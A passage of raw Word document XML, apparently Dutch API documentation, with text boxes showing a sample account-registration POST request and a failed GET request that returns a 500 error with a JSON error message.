                              <w:t>=0610000000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8AB96" id="Text Box 508" o:spid="_x0000_s1079" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.6pt;margin-top:37.2pt;width:462.45pt;height:60.2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KYEIoCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRbT9swFH6ftP9g+X2kZS2wihR1IKZJaKDB&#10;xLPr2DSa4+PZbpvu1++zk5SK8cK0l+T43C/fOecXbWPYRvlQky35+GjEmbKSqto+lfzHw/WHM85C&#10;FLYShqwq+U4FfjF//+5862bqmFZkKuUZnNgw27qSr2J0s6IIcqUaEY7IKQuhJt+IiKd/KiovtvDe&#10;mOJ4NDoptuQr50mqEMC96oR8nv1rrWS81TqoyEzJkVvMX5+/y/Qt5udi9uSFW9WyT0P8QxaNqC2C&#10;7l1diSjY2td/uWpq6SmQjkeSmoK0rqXKNaCa8ehFNfcr4VSuBc0Jbt+m8P/cym+bO8/qquTTEUZl&#10;RYMhPag2ss/UssRDh7YuzKB476AaWwgw6YEfwEyFt9o36Y+SGOTo9W7f3+ROgjk9O/04Hk85k5Cd&#10;nkymkzyA4tna+RC/KGpYIkruMb/cVrG5CRGZQHVQScEsXdfG5BkamxiBTF0lXn4kEKlL49lGYPyx&#10;zUnDxYEWXp2lymDpo6SCu8IyFXdGJYfGflcazcr1vRJBSKlsHKJk7aSlkc9bDHv9ZNpl9RbjvUWO&#10;TDbujZvaks/dzNv13Jjq55Cy7vTR54O6ExnbZZtRMjkZBr+kagc8eOp2Kjh5XWNoNyLEO+GxRIAA&#10;DkO8xUcb2paceoqzFfnfr/GTPrANKWdbLGXJw6+18Ioz89UC9Z/GE0CGxfyYTE+P8fCHkuWhxK6b&#10;S8LgxzhBTmYy6UczkNpT84j7sUhRIRJWIjaQMpCXsTsVuD9SLRZZCXvrRLyx904m16nNCZIP7aPw&#10;rsdtBOK/0bC+YvYCvp1usrS0WEfSdcZ2anTX1X4A2PkM+f4+paNy+M5az1d0/gcAAP//AwBQSwME&#10;FAAGAAgAAAAhAM3VF2/iAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwkAQhe8m/ofNmHiD&#10;LdjQWrslCiExBA+AIR6X7tg2dmeb7gLl3zuc9Dh5X977Jp8PthVn7H3jSMFkHIFAKp1pqFLwuV+N&#10;UhA+aDK6dYQKruhhXtzf5Toz7kJbPO9CJbiEfKYV1CF0mZS+rNFqP3YdEmffrrc68NlX0vT6wuW2&#10;ldMomkmrG+KFWne4qLH82Z2sgvf9db1NFh8zu35bfm0O0h9Wy41Sjw/D6wuIgEP4g+Gmz+pQsNPR&#10;nch40SoYxZMpowqSOAbBQJo+JSCOTD7HKcgil/9fKH4BAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZ&#10;w8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAQfKYEIoCAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAzdUXb+IAAAAKAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6F930949" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">POST </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>registreer</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>account HTTP</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                        <w:t>1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="76D81666" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5AE04203" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="005761F4" w:rsidRDefault="00CE4BB5" w:rsidP="00380494">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>naam</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>Pim&amp;email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>mail@email.nl&amp;bedrijf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>company&amp;tel</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005761F4">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=0610000000</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00465456">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6BBFFB" w14:textId="342AAC28" w:rsidR="00710940" w:rsidRDefault="009A3842">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251940864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DE4B298" wp14:editId="20EB6353">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4243705</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5874385" cy="1031240"/>
                <wp:effectExtent l="0" t="0" r="18415" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="210" name="Text Box 210"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5874385" cy="10312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0910950" w14:textId="36B7E77A" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>500 server error</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7E644C48" w14:textId="3C018F9B" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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5AAAAD33" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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41F87771" w14:textId="02DB17C8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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 xml:space="preserve">  “error</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>” :</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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Ophalen</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> van data </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>mislukt</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22EF1277" w14:textId="60C35DF5" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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68CF6D79" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C247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4B298" id="Text Box 210" o:spid="_x0000_s1080" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:334.15pt;width:462.55pt;height:81.2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7sUIsCAACOBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIU8pgFSnqQEyTEKDB&#10;xLPr2NSa4/Psa5Pur9/ZSUrF9sK0l+R83x+/u/OLrrFsq0I04CpeHk04U05Cbdxzxb8/Xn844yyi&#10;cLWw4FTFdyryi8X7d+etn6sprMHWKjBy4uK89RVfI/p5UUS5Vo2IR+CVI6GG0AikZ3gu6iBa8t7Y&#10;YjqZfCxaCLUPIFWMxL3qhXyR/WutJN5pHRUyW3HKDfM35O8qfYvFuZg/B+HXRg5piH/IohHGUdC9&#10;qyuBgm2C+cNVY2SACBqPJDQFaG2kyjVQNeXkVTUPa+FVroWaE/2+TfH/uZW32/vATF3xaUn9caKh&#10;IT2qDtln6FjiUYdaH+ek+OBJFTsS0KRHfiRmKrzToUl/KomRnHzt9v1N7iQxT85OZ8dnJ5xJkpWT&#10;43I6y/6LF3MfIn5R0LBEVDzQAHNfxfYmIqVCqqNKiubg2libh2hdYkSwpk68/EgoUpc2sK2g+WOX&#10;syYXB1r06i1VRssQJVXcV5Yp3FmVHFr3TWnqVi7wLxGElMrhGCVrJy1N+bzFcNBPpn1WbzHeW+TI&#10;4HBv3BgHIXczr9dLY+ofY8q616c+H9SdSOxWXYbJ7HSc/ArqHQEiQL9U0ctrQ0O7ERHvRaAtIgzQ&#10;ZcA7+mgLbcVhoDhbQ/j1N37SJ3CTlLOWtrLi8edGBMWZ/eoI9p/KGUGGYX7MTk6n9AiHktWhxG2a&#10;S6DBl3SDvMxk0kc7kjpA80QHZJmikkg4SbEJKSN5if2toAMk1XKZlWhxvcAb9+Blcp3anCD52D2J&#10;4AfcIkH+Fsb9FfNX8O11k6WD5QZBm4zt1Oi+q8MAaOkz5IcDla7K4TtrvZzRxW8AAAD//wMAUEsD&#10;BBQABgAIAAAAIQBXvDda4wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8JAEIXvJv6HzZh4&#10;g22paWvtlCCExBA8AIZ4XNqxbezONt0Fyr93Pelx8r68900+H3UnLjTY1jBCOA1AEJemarlG+Dis&#10;JykI6xRXqjNMCDeyMC/u73KVVebKO7rsXS18CdtMITTO9ZmUtmxIKzs1PbHPvsyglfPnUMtqUFdf&#10;rjs5C4JYatWyX2hUT8uGyu/9WSO8HW6bXbJ8j/XmdfW5PUp7XK+2iI8P4+IFhKPR/cHwq+/VofBO&#10;J3PmyooOYRKGiUcR4jiNQHjiOYyeQJwQ0ihIQBa5/P9D8QMAAP//AwBQSwECLQAUAAYACAAAACEA&#10;5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQA&#10;BgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQA&#10;BgAIAAAAIQB4TuxQiwIAAI4FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQBXvDda4wAAAAsBAAAPAAAAAAAAAAAAAAAAAOMEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAA8wUAAAAA&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="40910950" w14:textId="36B7E77A" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>500 server error</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7E644C48" w14:textId="3C018F9B" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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5AAAAD33" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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41F87771" w14:textId="02DB17C8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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 xml:space="preserve">  “error</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>” :</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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Ophalen</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> van data </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>mislukt</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="22EF1277" w14:textId="60C35DF5" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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68CF6D79" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C24703"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00624E0D">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251944960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36B84332" wp14:editId="21C922D6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5895340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3903345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15" name="Curved Left Arrow 215"/>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19701C" id="Curved Left Arrow 215" o:spid="_x0000_s1026" type="#_x0000_t103" style="position:absolute;margin-left:464.2pt;margin-top:307.35pt;width:22pt;height:45pt;z-index:251944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dQSJwCAADCBQAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF8dB8m6BnWKIEWHAUFb&#10;rB16VmQpNiCLGqXEyX79KNlx+oUNGHaRRZN8JJ9IXl7tG8N2Cn0NtuD52YgzZSWUtd0U/Mfjzacv&#10;nPkgbCkMWFXwg/L8av7xw2XrZmoMFZhSISMQ62etK3gVgptlmZeVaoQ/A6csKTVgIwKJuMlKFC2h&#10;NyYbj0afsxawdAhSeU9/rzslnyd8rZUMd1p7FZgpOOUW0onpXMczm1+K2QaFq2rZpyH+IYtG1JaC&#10;DlDXIgi2xfoNVFNLBA86nEloMtC6lirVQNXko1fVPFTCqVQLkePdQJP/f7DydnePrC4LPs6nnFnR&#10;0CMtt7hTJVspHdgCEVoWlURV6/yMPB7cPfaSp2use6+xiV+qiO0TvYeBXrUPTNLP8fnFZESPIEk1&#10;Pc+ndCeU7OTs0IevChoWLwWXKY2YRUoi8St2Kx86r6N1DOvB1OVNbUwSYvOopUG2E/Ts6824j/PC&#10;yti/OYZ9/taR0o2eWaSiKz7dwsGoiGfsd6WJz1huSjh18ikZIaWyIe9UlShVlyNxMbAxeCRuEmBE&#10;1lTdgN0DvCz0iN3R09tHV5UGYXAe/SmxznnwSJHBhsG5qS3gewCGquojd/ZHkjpqIktrKA/UbQjd&#10;GHonb2p66ZXw4V4gzR01B+2ScEeHNtAWHPobZxXgr/f+R3saB9Jy1tIcF9z/3ApUnJlvlgblIp9M&#10;4uAnYTI9H5OAzzXr5xq7bZZAPZPT1nIyXaN9MMerRmieaOUsYlRSCSspNvVqwKOwDN1+oaUl1WKR&#10;zGjYnQgr++BkBI+sxvZ93D8JdH27B5qTWzjOvJi9avXONnpaWGwD6DrNwYnXnm9aFKlx+qUWN9Fz&#10;OVmdVu/8NwAAAP//AwBQSwMEFAAGAAgAAAAhANsPZsHeAAAACwEAAA8AAABkcnMvZG93bnJldi54&#10;bWxMj8FKw0AQhu+C77CM4M1uEkqSxkyKFAQreLDqfZsdk2B2NmS3bXx7x5Me55+Pf76pt4sb1Znm&#10;MHhGSFcJKOLW24E7hPe3x7sSVIiGrRk9E8I3Bdg211e1qay/8CudD7FTUsKhMgh9jFOldWh7cias&#10;/EQsu08/OxNlnDttZ3ORcjfqLEly7czAcqE3E+16ar8OJ4fwkpc+52VfPtGeE6936TQ8fyDe3iwP&#10;96AiLfEPhl99UYdGnI7+xDaoEWGTlWtBEfJ0XYASYlNkkhwRikQS3dT6/w/NDwAAAP//AwBQSwEC&#10;LQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNd&#10;LnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8u&#10;cmVsc1BLAQItABQABgAIAAAAIQBlV1BInAIAAMIFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItABQABgAIAAAAIQDbD2bB3gAAAAsBAAAPAAAAAAAAAAAAAAAAAPQEAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA/wUAAAAA&#10;" adj="16320,20280,5400" fillcolor="#e7e6e6 [3214]" strokecolor="black [3213]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C24703">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251942912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49088952" wp14:editId="67FF5C43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-75565</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3216910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842000" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="25400" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="211" name="Text Box 211"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5842000" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent2">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ECEE20C" w14:textId="2C17B5D5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C24703">
                            <w:r>
                              <w:t>Gefaalde GET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088952" id="Text Box 211" o:spid="_x0000_s1081" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.95pt;margin-top:253.3pt;width:460pt;height:18.2pt;z-index:251942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WAvGaUCAAD0BQAADgAAAGRycy9lMm9Eb2MueG1srFRbb9MwFH5H4j9YfmdpSwejWjqVTUNIY5vY&#10;0J5dx14jHB9ju23Gr+ezk3RlgNAQL8nxuZ/vXI5P2sawjfKhJlvy8cGIM2UlVbW9L/mX2/NXR5yF&#10;KGwlDFlV8gcV+Mn85YvjrZupCa3IVMozOLFhtnUlX8XoZkUR5Eo1IhyQUxZCTb4REU9/X1RebOG9&#10;McVkNHpTbMlXzpNUIYB71gn5PPvXWsl4pXVQkZmSI7eYvz5/l+lbzI/F7N4Lt6pln4b4hywaUVsE&#10;3bk6E1Gwta9/cdXU0lMgHQ8kNQVpXUuVa0A149GTam5WwqlcC8AJbgdT+H9u5eXm2rO6KvlkPObM&#10;igZNulVtZO+pZYkHhLYuzKB446AaWwjQ6YEfwEyFt9o36Y+SGOTA+mGHb3InwTw8mqJnEEnIJq/H&#10;42luQPFo7XyIHxQ1LBEl9+hfhlVsLkJEJlAdVFKwQKauzmtj8iPNjDo1nm0Eui2kVDZOsrlZN5+o&#10;6vhTZND3HWxMR8d+M7ARIk9f8pQD/hTE2L/FjW3GJrl5zA6vzlLlmeyLSbh2+GUqPhiVvBv7WWn0&#10;JMP4x8qGKFk7aWng8BzDXj+Zdlk9x3hnkSOTjTvjprbkM+o7GDuEq69DyrrTB7p7dScytss2D+P0&#10;aJivJVUPGDtP3eoGJ89rzMaFCPFaeOwqxgn3J17how1tS049xdmK/Pff8ZM+VghSzrbY/ZKHb2vh&#10;FWfmo8VyvRtPMZks5sf08O0ED78vWe5L7Lo5JQwc1gfZZTLpRzOQ2lNzhzO1SFEhElYidsnjQJ7G&#10;7iLhzEm1WGQlnAcn4oW9cTK5TjCnyb9t74R3/XpELNYlDVdCzJ5sSaebLC0t1pF0nVcoAd2h2jcA&#10;pyUPen8G0+3af2etx2M9/wEAAP//AwBQSwMEFAAGAAgAAAAhAAk0WOnjAAAACwEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG5b0o11XWk6wRBC48S6HThmjWmrNU7VZF3h6RdOcLT9&#10;6ff3Z+vRtGzA3jWWJERTAQyptLqhSsJh/zpJgDmvSKvWEkr4Rgfr/PYmU6m2F9rhUPiKhRByqZJQ&#10;e9+lnLuyRqPc1HZI4fZle6N8GPuK615dQrhp+UyImBvVUPhQqw43NZan4mwkfP68P78ttstyP7zM&#10;PnbbeYHJaSPl/d349AjM4+j/YPjVD+qQB6ejPZN2rJUwiaJVQCUsRBwDC8RKJBGwY9g8zAXwPOP/&#10;O+RXAAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL1gLxmlAgAA9AUAAA4AAAAAAAAAAAAA&#10;AAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAk0WOnjAAAACwEAAA8AAAAAAAAA&#10;AAAAAAAA/QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAANBgAAAAA=&#10;" fillcolor="#f7caac [1301]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4ECEE20C" w14:textId="2C17B5D5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C24703">
                      <w:r>
                        <w:t>Gefaalde GET Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C24703">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251938816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F3020E1" wp14:editId="641B4C93">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3677920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5867400" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="208" name="Text Box 208"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="58674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D555D8E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00C24703">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
